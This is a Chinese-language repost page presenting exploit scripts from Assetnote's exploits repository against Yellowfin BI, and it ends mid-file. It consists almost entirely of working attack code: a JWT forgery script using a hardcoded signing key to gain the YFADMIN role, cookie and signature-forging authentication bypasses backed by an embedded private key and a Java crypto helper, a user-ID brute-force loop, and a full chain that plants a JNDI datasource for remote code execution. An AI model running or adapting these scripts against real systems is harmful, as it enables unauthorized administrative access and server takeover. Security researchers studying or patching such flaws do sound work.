存储由Assetnotes安全研究团队创建的漏洞的存储库

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/assetnote/exploits

相关脚本

AccPrivEsc_REST.py

import jwt, json
import requests, sys
import time, datetime

yf_base_url = sys.argv[1]
email = sys.argv[2]
password = sys.argv[3]
UUID = sys.argv[4]

key = """q0x3DBLMJyteqkbUIx+7NzotD1K46kvfj7TW7i2ID4lBFyB9wse3cRw0buRrfKjzEuw5VySDrDsG\neyAPUukScQ=="""

def get_refresh_token(username,password):
    millis = int(round(time.time() * 1000))

    headers = {
        "Authorization": f"YELLOWFIN ts={millis}, nonce=random",
        "Content-Type": "application/json",
        "Accept": "application/vnd.yellowfin.api-v1+json",
    }

    payload = json.dumps(
        {
            "userName": username,
            "password": password,
            "clientOrgRef": "default_org",
        }
    )

    refresh_token_url = f"{yf_base_url}/api/refresh-tokens"

    r = requests.request("POST", url=refresh_token_url, headers=headers, data=payload)
    r_dict = json.loads(r.text)
    return r_dict["securityToken"]

def get_access_token(refresh_token):
    ACCESS_TOKEN_URL = f"{yf_base_url}/api/access-tokens"

    millis = int(round(time.time() * 1000))
    headers = {
        "Accept": "application/vnd.yellowfin.api-v1+json",
        "Authorization": f"YELLOWFIN ts={millis}, nonce=random, token={refresh_token}",
        "Content-Type": "application/json",
    }

    r = requests.post(url=ACCESS_TOKEN_URL, headers=headers)
    r_dict = json.loads(r.text)
    return r_dict["securityToken"]

def get_roles(token):
    ROLES_URL = f"{yf_base_url}/api/roles"

    millis = int(round(time.time() * 1000))
    headers = {
        "Accept": "application/vnd.yellowfin.api-v1+json",
        "Authorization": f"YELLOWFIN ts={millis}, nonce=random, token={token}",
        "Content-Type": "application/json",
    }

    r = requests.get(url=ROLES_URL, headers=headers)
    return r.text

if __name__ == '__main__':
    testyRTok = get_refresh_token(email,password)
    testyATok = get_access_token(testyRTok)
    print("LOG: GOT TOKEN ONE")
    print(f"LOG: Roles For LOW PRIV USER: {get_roles(testyATok)}")
    testyATok = jwt.decode(testyATok,key,algorithms=["HS256"])
    print("LOG: Forging New Token")
    testyATok["person"] = UUID
    testyATok["role"] = "YFADMIN"
    print(f"LOG: Attempting To Login As User ID: {UUID}")
    adminATok = jwt.encode(testyATok, key, algorithm="HS256")
    print(f"LOG: Roles For ADMIN: {get_roles(adminATok)}")

AuthBypass_JSAPI.py

import requests, os, uuid
url = os.sys.argv[1]

s = requests.Session()
s.get(url)

def encrypt(txt):
	return os.popen("java Enc "+txt).read().split('\n')[0]

def loginAs(uuid):
	cookies = {
		"EXTAPI-IPID":encrypt(uuid),
		"EXTAPI-REFID":encrypt("quickLogon")
	}
	data = {
		"api" : "auth",
		"callback":"pew",
	}
	r=s.post(url+"/JsAPI?version=3.0",data=data,cookies=cookies)

def adminReq():
	r =s.get(url+f"/MIEntry.i4;tab_token={uuid.uuid4()};m=1?REQUESTTOKEN=null")
	return r.text

if __name__ == '__main__':
	for ID in range(0,1000):
		s = requests.Session()
		s.get(url)	
		loginAs(str(ID))
		x=adminReq()
		print(f"uuid: {ID}, l: {len(x)}")

AuthBypass_STORY.py

import requests, sys, uuid

url = sys.argv[1]

ID = sys.argv[2]

"""
The Private Key

-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCkrT8rnZrnjKYzruZG5eswBmR70+vsNpz2Q1N2wBwlUcptzz+5mQ4usamFS6DQpfKGhOhoaMtd+c+rwsFj/lkMeoKJ+cP1zxN0ED/lGcwSNE7GSpm/G3sdQHVBoVVTuALhFklQj+Vrr/ebiHKi6InAdWhHGH8yteqI9BzL7YjHrrL3oCoLWh+M8RokNOSe5/ID7/WRDfJ+TPAWS4Ba+A/lOxWhXJiclM7Masc0jXz0M3YtkfePuKo+/THuV2/UFC/WwwECf/0qs1fJFLYiOJVIFIxc1ZQuRRhzJOmb7gDmSsaX0vozMS8bJfFhf2mXYX9K+H4cioDK8ZonqxseTnndAgMBAAECggEBAI321MiS/CG1vOo9U0O3nkMun52omnBuvG4IqIFtKFZ75lk4G6Wy7ukOPCgvhJmbFjMljP3FqdyAKanXIcVEVhxN2Q99hJP6Srj58TteO/FNqsODOHvqAv66vNsxbE/aCJFnFxkelBd8AafRv5H1ihuim5z+31kmPuSGHfUn94y8CgmSrIkd9CWcbZElkFskGYdYUAI34TFcYNBkurvH55eFrlJa8qq/2i6Ym75JkONG9ahctscz5khp2PW+KtLl9CtQobZyAlmkVpfr+o+Jl94SisM2D4VWU3CSo2i/HKIlrfKYjYxyMnNSgUF9WSwpHsuTcJswpVyRmet+pguEC0ECgYEA2FxiDC96URd46noYlCyzcbYLiMPGucLf6laAA1ps3P57NLOLkldbXIIfl8Ya9GajLuYkADHkrZm0fyWEH4VaWATdnEz70Eym5H5NLJ4kbYWvhZnTTAURH0vNOQQyojcFD7By2+9n1Usu0vN0k7tokPI2+CSdHtOFXK+kUKc878kCgYEAwtjO96mRP7+NCHsuWbRd27xqmpdSbNya0oaYjaEK7N7p+Tva4S4PE3zgLS4QKDxB8vLZh7zlsmf31FyuJ+TgCSGKa/Q4Kpp32vRHCoT+Sm7f+r8N1TxqbMZr1ddmqut4t2tK6W+xwfeZbjbOGNmK2Oub4wtOSHNhlvjOzmgNS3UCgYEA0IbZiN0JiraQt4zNu6IJoQLPwxTNp6QGo5iS8KhqW+R5YqXZU0YWq+ZOBL3OpNd3V3BAKl/sAtUtfY3u9WJVXJfz7vzThkMaZwbD4sjYWyaJsL49Q/tuMTehp94/3tAgdKqfSRJIhO5dRruWE/yAH5MTH75KILfExTwTphhJRuECgYEAhQG9HqDY7vxSSMTVmhSesX4IA2lisb9RzH5mqt+Q9qsgaqsqOebYEcR/vzeffefMWQzf42HWJpgEPCncFI2PRYxo0lKO+L4jLQrtZ8frUmIncSJ0TeiE+aXlPL9ibTB6YjLSm1FMtYzQZsTwoVP3DSagbjdsg9aHeqhze8DZunUCgYBst5P8k/h2FWqBpq1+gununsPrCVwVSZG/DqKAlMO08Y/ikmDIB5sCtcMgDkky4rqf7dAcV0TeXki3hVQI0ri1WebFKFerKy4N/43+FMdTWo9o/umL+7ZZGmPbYYX97XtdLekRqWO3uUzsw6xCC9fWoCCZ6H2uVIFEMpuHWkYj/A==
-----END PRIVATE KEY-----
"""

"""IS query params storyUUID + ts in this case PEWPEW+XXD"""
validSig = """FeHGWgaVoDHPbZYf0+I6BSAHBSacV/2MjbVtnaHLbnuW3cr0sLs2rwo1MWtZ1mtmNwjLLY1nXfZX+BL9FMwc4poix6WpEvQTGr0oxOmOQe82SF0/iJV8FRYNZPEJ8vVjuMh9c7zxo6A1zEqWRiTdWx5HFvF+saEIug6ujYIXx8jptzxMzkRn77FIx4McnPBLlfoodjkKXufrsK2JBOvqXjOsgJqv9SdZqcbm9LnQ4GolYGCHvsLZ9MTHFzIS37TNjRULVupdC92f+90Any6FvIYMsGiozp/c235+xPV68WNmLgLFsYyRR7RjN4oWq7yb+T5hIhlQnJr8CIej2eVq6w=="""

if __name__ == '__main__':
	s = requests.Session()
	s.get(url)

	s.post(
		url+"/StoryBody.i4",
		data = {
			"storyUUID": "PEWPEW",
			"ts": "XXD",
			"s":validSig,
			"action":"WHATEVER",
			"ipPerson":ID,
			"ipOrg":"1"
		}
	)

	print(f"Is Authenticated: {s.get(url+'/logonCheck.i4').status_code}")

	print(f"Authenticated JSESSIONID: {s.cookies.get('JSESSIONID')}")

	print(f"Licence: {s.get(url+f'/MIAdminLicenceAjax.i4;tab_token={uuid.uuid4()};m=1?REQUESTTOKEN=null').text}")

Enc.java

import java.util.Arrays;
import java.util.UUID;
import java.security.spec.InvalidKeySpecException;
import java.security.NoSuchAlgorithmException;
import javax.crypto.spec.SecretKeySpec;
import javax.crypto.spec.PBEKeySpec;
import java.nio.BufferUnderflowException;
import java.nio.ByteBuffer;
import java.security.spec.AlgorithmParameterSpec;
import javax.crypto.spec.GCMParameterSpec;
import javax.crypto.SecretKey;
import java.security.Key;
import javax.crypto.Cipher;
import java.security.spec.KeySpec;
import javax.crypto.spec.DESedeKeySpec;
import javax.crypto.SecretKeyFactory;
import java.io.IOException;
import java.security.GeneralSecurityException;
import java.nio.charset.StandardCharsets;
import java.io.FilterOutputStream;
import java.io.FilterInputStream;
import java.io.ObjectInputStream;
import java.io.ByteArrayInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.File;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.OutputStream;
import java.io.ByteArrayOutputStream;
import java.io.Serializable;


class Enc {
    public static void main(String[] args) {
        String txt = args[0];
        CryptoHelperSimple cc = new CryptoHelperSimple(null,txt);
        System.out.println(cc.encryptToString()); 
    }
}




class CryptoHelperSimple
{
    private static final String F = "AES/GCM/NoPadding";
    private static final int A = 128;
    private static final int D = 12;
    private static final int E = 256;
    private String C;
    private String B;
    private static final String G = "$2a$10$EoSdh23ee1C9wtJOY5cv6uHrc0ilaqynX2nrR/hZyjuiE8YWeKVCa";
    
    public CryptoHelperSimple(final String c, final String b) {
        if (c == null) {
            this.C = "$2a$10$EoSdh23ee1C9wtJOY5cv6uHrc0ilaqynX2nrR/hZyjuiE8YWeKVCa";
        }
        else {
            this.C = c;
        }
        this.B = b;
    }
    
    public String encryptToString() {
        try {
            return Base64.encodeBytes(this.encryptAes(this.B.getBytes(StandardCharsets.UTF_8), this.getAesKey(this.C.toCharArray())));
        }
        catch (GeneralSecurityException | IOException ex) {  
            System.out.println("BAD");
        }
        return "";
    }
    
    public String decryptFromString() {
        try {
            return this.decryptAes(Base64.decode(this.B), this.getAesKey(this.C.toCharArray()));
        }
        catch (GeneralSecurityException | IOException ex) {
            try {
                final SecretKey generateSecret = SecretKeyFactory.getInstance("DESede").generateSecret(new DESedeKeySpec(this.C.getBytes("UTF-8")));
                final Cipher instance = Cipher.getInstance("DESede");
                instance.init(2, generateSecret);
                return new String(instance.doFinal(Base64.decode(this.B)), "UTF-8");
            }
            catch (IOException | GeneralSecurityException ex2) {
                final Object cause;
                System.out.println("BAD");
            }
        }
        return "";
    }
    
    public byte[] encryptAes(final byte[] input, final SecretKey key) throws IOException, GeneralSecurityException {
        final byte[] aesIv = this.getAesIv();
        final Cipher instance = Cipher.getInstance("AES/GCM/NoPadding");
        instance.init(1, key, new GCMParameterSpec(128, aesIv));
        final byte[] doFinal = instance.doFinal(input);
        return ByteBuffer.allocate(aesIv.length + doFinal.length).put(aesIv).put(doFinal).array();
    }
    
    public String decryptAes(final byte[] array, final SecretKey key) throws IOException, GeneralSecurityException {
        final ByteBuffer wrap = ByteBuffer.wrap(array);
        final byte[] aesIv = this.getAesIv();
        try {
            wrap.get(aesIv);
        }
        catch (BufferUnderflowException ex) {
            throw new IOException("Buffer Underflow");
        }
        final byte[] array2 = new byte[wrap.remaining()];
        try {
            wrap.get(array2);
        }
        catch (BufferUnderflowException ex2) {
            throw new IOException("Buffer Underflow");
        }
        final Cipher instance = Cipher.getInstance("AES/GCM/NoPadding");
        instance.init(2, key, new GCMParameterSpec(128, aesIv));
        return new String(instance.doFinal(array2), StandardCharsets.UTF_8);
    }
    
    public SecretKey getAesKey(final char[] password) throws NoSuchAlgorithmException, InvalidKeySpecException {
        return new SecretKeySpec(SecretKeyFactory.getInstance("PBKDF2WithHmacSHA256").generateSecret(new PBEKeySpec(password, this.getAesIv(), 65536, 256)).getEncoded(), "AES");
    }
    
    public byte[] getAesIv() {
        return Arrays.copyOf(UUID.nameUUIDFromBytes("YellowfinReporting".getBytes(StandardCharsets.UTF_8)).toString().getBytes(StandardCharsets.UTF_8), 12);
    }
}

class Base64
{
    public static final boolean ENCODE = true;
    public static final boolean DECODE = false;
    private static final int B = 76;
    private static final byte F = 61;
    private static final byte G = 10;
    private static final byte[] E;
    private static final byte[] C;
    private static final byte H = -9;
    private static final byte A = -5;
    private static final byte D = -1;
    
    private Base64() {
    }
    
    private static byte[] C(final byte[] array) {
        return B(array, 3);
    }
    
    private static byte[] B(final byte[] array, final int n) {
        final byte[] array2 = new byte[4];
        B(array, 0, n, array2, 0);
        return array2;
    }
    
    private static byte[] B(final byte[] array, final int n, final int n2, final byte[] array2, final int n3) {
        final int n4 = ((n2 > 0) ? (array[n] << 24 >>> 8) : 0) | ((n2 > 1) ? (array[n + 1] << 24 >>> 16) : 0) | ((n2 > 2) ? (array[n + 2] << 24 >>> 24) : 0);
        switch (n2) {
            case 3: {
                array2[n3] = Base64.E[n4 >>> 18];
                array2[n3 + 1] = Base64.E[n4 >>> 12 & 0x3F];
                array2[n3 + 2] = Base64.E[n4 >>> 6 & 0x3F];
                array2[n3 + 3] = Base64.E[n4 & 0x3F];
                return array2;
            }
            case 2: {
                array2[n3] = Base64.E[n4 >>> 18];
                array2[n3 + 1] = Base64.E[n4 >>> 12 & 0x3F];
                array2[n3 + 2] = Base64.E[n4 >>> 6 & 0x3F];
                array2[n3 + 3] = 61;
                return array2;
            }
            case 1: {
                array2[n3] = Base64.E[n4 >>> 18];
                array2[n3 + 1] = Base64.E[n4 >>> 12 & 0x3F];
                array2[n3 + 3] = (array2[n3 + 2] = 61);
                return array2;
            }
            default: {
                return array2;
            }
        }
    }
    
    public static String encodeObject(final Serializable s) {
        return encodeObject(s, true);
    }
    
    public static String encodeObject(final Serializable obj, final boolean b) {
        ByteArrayOutputStream byteArrayOutputStream = null;
        java.io.OutputStream out = null;
        ObjectOutputStream objectOutputStream = null;
        try {
            byteArrayOutputStream = new ByteArrayOutputStream();
            out = new OutputStream(byteArrayOutputStream, true, b);
            objectOutputStream = new ObjectOutputStream(out);
            objectOutputStream.writeObject(obj);
        }
        catch (IOException ex) {
            ex.printStackTrace();
            return null;
        }
        finally {
            try {
                objectOutputStream.close();
            }
            catch (Exception ex2) {}
            try {
                out.close();
            }
            catch (Exception ex3) {}
            try {
                byteArrayOutputStream.close();
            }
            catch (Exception ex4) {}
        }
        return new String(byteArrayOutputStream.toByteArray());
    }
    
    public static String encodeBytes(final byte[] array) {
        return encodeBytes(array, true);
    }
    
    public static String encodeBytes(final byte[] array, final boolean b) {
        if (array == null) {
            return null;
        }
        return encodeBytes(array, 0, array.length, b);
    }
    
    public static String encodeBytes(final byte[] array, final int n, final int n2) {
        return encodeBytes(array, n, n2, true);
    }
    
    public static String encodeBytes(final byte[] array, final int n, final int n2, final boolean b) {
        final int n3 = n2 * 4 / 3;
        final byte[] bytes = new byte[n3 + ((n2 % 3 > 0) ? 4 : 0) + (b ? (n3 / 76) : 0)];
        int i = 0;
        int length = 0;
        final int n4 = n2 - 2;
        int n5 = 0;
        while (i < n4) {
            B(array, i + n, 3, bytes, length);
            n5 += 4;
            if (b && n5 == 76) {
                bytes[length + 4] = 10;
                ++length;
                n5 = 0;
            }
            i += 3;
            length += 4;
        }
        if (i < n2) {
            B(array, i + n, n2 - i, bytes, length);
            length += 4;
        }
        return new String(bytes, 0, length);
    }
    
    @Deprecated
    public static String encodeString(final String s) {
        return encodeString(s, true);
    }
    
    public static String encodeStringUTF8(final String s) {
        return encodeStringUTF8(s, true);
    }
    
    @Deprecated
    public static String encodeString(final String s, final boolean b) {
        return encodeBytes(s.getBytes(), b);
    }
    
    public static String encodeStringUTF8(final String s, final boolean b) {
        byte[] bytes;
        try {
            bytes = s.getBytes("UTF-8");
        }
        catch (Exception ex) {
            return null;
        }
        return encodeBytes(bytes, b);
    }
    
    public static byte[] readFile(final String pathname, final boolean b) {
        return readFile(new File(pathname), b);
    }
    
    public static byte[] readFile(final File file, final boolean b) {
        byte[] array = new byte[100];
        Object o = null;
        int n = 0;
        InputStream inputStream = null;
        try {
            inputStream = new InputStream(new BufferedInputStream(new FileInputStream(file)), b);
            int read;
            while ((read = inputStream.read()) >= 0) {
                if (n >= array.length) {
                    final byte[] array2 = new byte[array.length << 1];
                    System.arraycopy(array, 0, array2, 0, array.length);
                    array = array2;
                }
                array[n++] = (byte)read;
            }
            o = new byte[n];
            System.arraycopy(array, 0, o, 0, n);
        }
        catch (IOException ex) {
            o = null;
        }
        finally {
            try {
                inputStream.close();
            }
            catch (Exception ex2) {}
        }
        return (byte[])o;
    }
    
    public static byte[] readFile(final java.io.InputStream in, final boolean b) {
        byte[] array = new byte[100];
        Object o = null;
        int n = 0;
        InputStream inputStream = null;
        try {
            inputStream = new InputStream(new BufferedInputStream(in), b);
            int read;
            while ((read = inputStream.read()) >= 0) {
                if (n >= array.length) {
                    final byte[] array2 = new byte[array.length << 1];
                    System.arraycopy(array, 0, array2, 0, array.length);
                    array = array2;
                }
                array[n++] = (byte)read;
            }
            o = new byte[n];
            System.arraycopy(array, 0, o, 0, n);
        }
        catch (IOException ex) {
            o = null;
        }
        finally {
            try {
                inputStream.close();
            }
            catch (Exception ex2) {}
        }
        return (byte[])o;
    }
    
    public static boolean writeFile(final byte[] array, final String pathname, final boolean b) {
        return writeFile(array, 0, array.length, new File(pathname), b);
    }
    
    public static boolean writeFile(final byte[] array, final File file, final boolean b) {
        return writeFile(array, 0, array.length, file, b);
    }
    
    public static boolean writeFile(final byte[] array, final int n, final int n2, final File file, final boolean b) {
        OutputStream outputStream = null;
        boolean b2 = false;
        try {
            outputStream = new OutputStream(new BufferedOutputStream(new FileOutputStream(file)), b);
            outputStream.write(array, n, n2);
            b2 = true;
        }
        catch (IOException ex) {
            b2 = false;
        }
        finally {
            try {
                outputStream.close();
            }
            catch (Exception ex2) {}
        }
        return b2;
    }
    
    public static String encodeFromFile(final String s) {
        final byte[] file = readFile(s, true);
        return (file == null) ? null : new String(file);
    }
    
    public static String encodeFromStream(final java.io.InputStream inputStream) {
        final byte[] file = readFile(inputStream, true);
        return (file == null) ? null : new String(file);
    }
    
    public static byte[] decodeFromFile(final String s) {
        return readFile(s, false);
    }
    
    public static boolean encodeToFile(final byte[] array, final String s) {
        return writeFile(array, s, true);
    }
    
    public static boolean decodeToFile(final byte[] array, final String s) {
        return writeFile(array, s, false);
    }
    
    private static byte[] B(final byte[] array) {
        final byte[] array2 = new byte[3];
        final int a = A(array, 0, array2, 0);
        final byte[] array3 = new byte[a];
        for (int i = 0; i < a; ++i) {
            array3[i] = array2[i];
        }
        return array3;
    }
    
    private static int A(final byte[] array, final int n, final byte[] array2, final int n2) {
        if (array[n + 2] == 61) {
            array2[n2] = (byte)(((Base64.C[array[n]] & 0xFF) << 18 | (Base64.C[array[n + 1]] & 0xFF) << 12) >>> 16);
            return 1;
        }
        if (array[n + 3] == 61) {
            final int n3 = (Base64.C[array[n]] & 0xFF) << 18 | (Base64.C[array[n + 1]] & 0xFF) << 12 | (Base64.C[array[n + 2]] & 0xFF) << 6;
            array2[n2] = (byte)(n3 >>> 16);
            array2[n2 + 1] = (byte)(n3 >>> 8);
            return 2;
        }
        try {
            final int n4 = (Base64.C[array[n]] & 0xFF) << 18 | (Base64.C[array[n + 1]] & 0xFF) << 12 | (Base64.C[array[n + 2]] & 0xFF) << 6 | (Base64.C[array[n + 3]] & 0xFF);
            array2[n2] = (byte)(n4 >> 16);
            array2[n2 + 1] = (byte)(n4 >> 8);
            array2[n2 + 2] = (byte)n4;
            return 3;
        }
        catch (Exception ex) {
            System.out.println("" + array[n] + ": " + Base64.C[array[n]]);
            System.out.println("" + array[n + 1] + ": " + Base64.C[array[n + 1]]);
            System.out.println("" + array[n + 2] + ": " + Base64.C[array[n + 2]]);
            System.out.println("" + array[n + 3] + ": " + Base64.C[array[n + 3]]);
            return -1;
        }
    }
    
    public static byte[] decode(final String s) {
        final byte[] bytes = s.getBytes();
        return decode(bytes, 0, bytes.length);
    }
    
    @Deprecated
    public static String decodeToString(final String s) {
        return new String(decode(s));
    }
    
    public static String decodeToUTF8String(final String s) {
        try {
            return new String(decode(s), "UTF-8");
        }
        catch (Exception ex) {
            return null;
        }
    }
    
    public static Object decodeToObject(final String s) {
        final byte[] decode = decode(s);
        java.io.InputStream in = null;
        ObjectInputStream objectInputStream = null;
        try {
            in = new ByteArrayInputStream(decode);
            objectInputStream = new ObjectInputStream(in);
            return objectInputStream.readObject();
        }
        catch (IOException ex) {
            ex.printStackTrace();
            return null;
        }
        catch (ClassNotFoundException ex2) {
            ex2.printStackTrace();
            return null;
        }
        finally {
            try {
                ((ByteArrayInputStream)in).close();
            }
            catch (Exception ex3) {}
            try {
                objectInputStream.close();
            }
            catch (Exception ex4) {}
        }
    }
    
    public static byte[] decode(final byte[] array, final int n, final int n2) {
        final byte[] array2 = new byte[n2 * 3 / 4];
        int n3 = 0;
        final byte[] array3 = new byte[4];
        int n4 = 0;
        for (int i = 0; i < n2; ++i) {
            final byte b = (byte)(array[i] & 0x7F);
            final byte b2 = Base64.C[b];
            if (b2 < -5) {
                System.err.println("Bad Base64 input character at " + i + ": " + array[i] + "(decimal)");
                return null;
            }
            if (b2 >= -1) {
                array3[n4++] = b;
                if (n4 > 3) {
                    n3 += A(array3, 0, array2, n3);
                    n4 = 0;
                    if (b == 61) {
                        break;
                    }
                }
            }
        }
        final byte[] array4 = new byte[n3];
        System.arraycopy(array2, 0, array4, 0, n3);
        return array4;
    }
    
    static {
        E = new byte[] { 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 43, 47 };
        C = new byte[] { -9, -9, -9, -9, -9, -9, -9, -9, -9, -5, -5, -9, -9, -5, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, -5, -9, -9, -9, -9, -9, -9, -9, -9, -9, -9, 62, -9, -9, -9, 63, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -9, -9, -9, -1, -9, -9, -9, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -9, -9, -9, -9, -9, -9, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -9, -9, -9, -9 };
    }
    
    public static class InputStream extends FilterInputStream
    {
        private boolean E;
        private int B;
        private byte[] C;
        private int D;
        private int G;
        private int A;
        private boolean F;
        
        public InputStream(final java.io.InputStream inputStream) {
            this(inputStream, false);
        }
        
        public InputStream(final java.io.InputStream inputStream, final boolean b) {
            this(inputStream, b, true);
        }
        
        public InputStream(final java.io.InputStream in, final boolean e, final boolean f) {
            super(in);
            this.F = f;
            this.E = e;
            this.D = (e ? 4 : 3);
            this.C = new byte[this.D];
            this.B = -1;
            this.A = 0;
        }
        
        @Override
        public int read() throws IOException {
            if (this.B < 0) {
                if (this.E) {
                    final byte[] array = new byte[3];
                    int n = 0;
                    for (int i = 0; i < 3; ++i) {
                        try {
                            final int read = this.in.read();
                            if (read >= 0) {
                                array[i] = (byte)read;
                                ++n;
                            }
                        }
                        catch (IOException ex) {
                            if (i == 0) {
                                throw ex;
                            }
                        }
                    }
                    if (n <= 0) {
                        return -1;
                    }
                    B(array, 0, n, this.C, 0);
                    this.B = 0;
                    this.G = 4;
                }
                else {
                    final byte[] array2 = new byte[4];
                    int j;
                    for (j = 0; j < 4; ++j) {
                        int read2;
                        do {
                            read2 = this.in.read();
                        } while (read2 >= 0 && Base64.C[read2 & 0x7F] <= -5);
                        if (read2 < 0) {
                            break;
                        }
                        array2[j] = (byte)read2;
                    }
                    if (j == 4) {
                        this.G = A(array2, 0, this.C, 0);
                        this.B = 0;
                    }
                    else {
                        if (j == 0) {
                            return -1;
                        }
                        throw new IOException("Improperly padded Base64 input.");
                    }
                }
            }
            if (this.B < 0) {
                throw new IOException("Error in Base64 code reading stream.");
            }
            if (this.B >= this.G) {
                return -1;
            }
            if (this.E && this.F && this.A >= 76) {
                this.A = 0;
                return 10;
            }
            ++this.A;
            final byte b = this.C[this.B++];
            if (this.B >= this.D) {
                this.B = -1;
            }
            return b & 0xFF;
        }
        
        @Override
        public int read(final byte[] array, final int n, final int n2) throws IOException {
            int i = 0;
            while (i < n2) {
                final int read = this.read();
                if (read >= 0) {
                    array[n + i] = (byte)read;
                    ++i;
                }
                else {
                    if (i == 0) {
                        return -1;
                    }
                    break;
                }
            }
            return i;
        }
    }
    
    public static class OutputStream extends FilterOutputStream
    {
        private boolean E;
        private int B;
        private byte[] C;
        private int D;
        private int A;
        private boolean F;
        
        public OutputStream(final java.io.OutputStream outputStream) {
            this(outputStream, true);
        }
        
        public OutputStream(final java.io.OutputStream outputStream, final boolean b) {
            this(outputStream, b, true);
        }
        
        public OutputStream(final java.io.OutputStream out, final boolean e, final boolean f) {
            super(out);
            this.F = f;
            this.E = e;
            this.D = (e ? 3 : 4);
            this.C = new byte[this.D];
            this.B = 0;
            this.A = 0;
        }
        
        @Override
        public void write(final int n) throws IOException {
            if (this.E) {
                this.C[this.B++] = (byte)n;
                if (this.B >= this.D) {
                    this.out.write(B(this.C, this.D));
                    this.A += 4;
                    if (this.F && this.A >= 76) {
                        this.out.write(10);
                        this.A = 0;
                    }
                    this.B = 0;
                }
            }
            else if (Base64.C[n & 0x7F] > -5) {
                this.C[this.B++] = (byte)n;
                if (this.B >= this.D) {
                    this.out.write(B(this.C));
                    this.B = 0;
                }
            }
            else if (Base64.C[n & 0x7F] != -5) {
                throw new IOException("Invalid character in Base64 data.");
            }
        }
        
        @Override
        public void write(final byte[] array, final int n, final int n2) throws IOException {
            for (int i = 0; i < n2; ++i) {
                this.write(array[n + i]);
            }
        }
        
        @Override
        public void flush() throws IOException {
            super.flush();
            if (this.B > 0) {
                if (!this.E) {
                    throw new IOException("Base64 input not properly padded.");
                }
                this.out.write(B(this.C, this.B));
                this.B = 0;
            }
            this.out.flush();
        }
        
        @Override
        public void close() throws IOException {
            super.close();
            this.out.close();
            this.C = null;
            this.out = null;
        }
    }
}

FullChain.py

import requests, os, uuid, json

ID = os.sys.argv[1]
url = os.sys.argv[2]
jndi = os.sys.argv[3]

s = requests.Session()
s.get(url)

def loginAs(ID):
	print(f"LOG: Attempting to Bypass Auth as User ID - {ID}")
	validSig = """FeHGWgaVoDHPbZYf0+I6BSAHBSacV/2MjbVtnaHLbnuW3cr0sLs2rwo1MWtZ1mtmNwjLLY1nXfZX+BL9FMwc4poix6WpEvQTGr0oxOmOQe82SF0/iJV8FRYNZPEJ8vVjuMh9c7zxo6A1zEqWRiTdWx5HFvF+saEIug6ujYIXx8jptzxMzkRn77FIx4McnPBLlfoodjkKXufrsK2JBOvqXjOsgJqv9SdZqcbm9LnQ4GolYGCHvsLZ9MTHFzIS37TNjRULVupdC92f+90Any6FvIYMsGiozp/c235+xPV68WNmLgLFsYyRR7RjN4oWq7yb+T5hIhlQnJr8CIej2eVq6w=="""
	s.post(
		url+"/StoryBody.i4",
		data = {
			"storyUUID": "PEWPEW",
			"ts": "XXD",
			"s":validSig,
			"action":"WHATEVER",
			"ipPerson":ID,
			"ipOrg":"1"
		}
	)
	return True

def triggerJNDI(jndi):
	print(f"LOG: Trigger JNDI Post Auth Exp - {jndi}")
	payload = {
    	"restrictedSourceCreation": False,
    	"displaySourceIcon": "connection_type_jndi",
    	"sourceClassName": "com.hof.sources.JNDISourcePlatformImplementation",
    	"enabledForTransformations": False,
    	"connectionMethodCode": "JNDI",
    	"displaySourceLongDescription": "",
    	"customParameters": [
        	{
            	"displayType": 4,
            	"defaultValue": "",
            	"displayName": "JNDI Datasource Name",
            	"uniqueKey": "DATABASEURL",
            	"disabled": False,
            	"refreshOnChange": False,
            	"value": jndi,
            	"clearsAllParameters": False,
            	"options": None
        	}
    	],
    	"userCanCreateView": True,
    	"databaseTypeCode": "GENERICJDBC",
    	"displaySourceName": "JNDI",
    	"validationMessages": "",
    	"sourceName": "PEW",
    	"sourceDescription": "HACKED"
	}
	r=s.post(
		url+f"/CreateSimpleSourceAjax.i4;tab_token={uuid.uuid4()};m=1?REQUESTTOKEN=None",
		data = {
			"action":"save",
			"json": json.dumps(payload),
			"testConnection": "true",
			"importPredefinedContent":""
		}
	)
	print(r.json())

if __name__ == '__main__':
	print("LOG: Starting FullChain Exploit!!!")
	loginAs(ID)
	triggerJNDI(jndi)
	print("LOG: DONE")

GenSig.java

import java.security.KeyFactory;
import java.security.PrivateKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.util.Base64;
import java.security.spec.InvalidKeySpecException;
import java.security.NoSuchAlgorithmException;
import java.security.Signature;
import java.nio.charset.StandardCharsets;
import java.security.InvalidKeyException;
import java.security.SignatureException;


class GenSig {
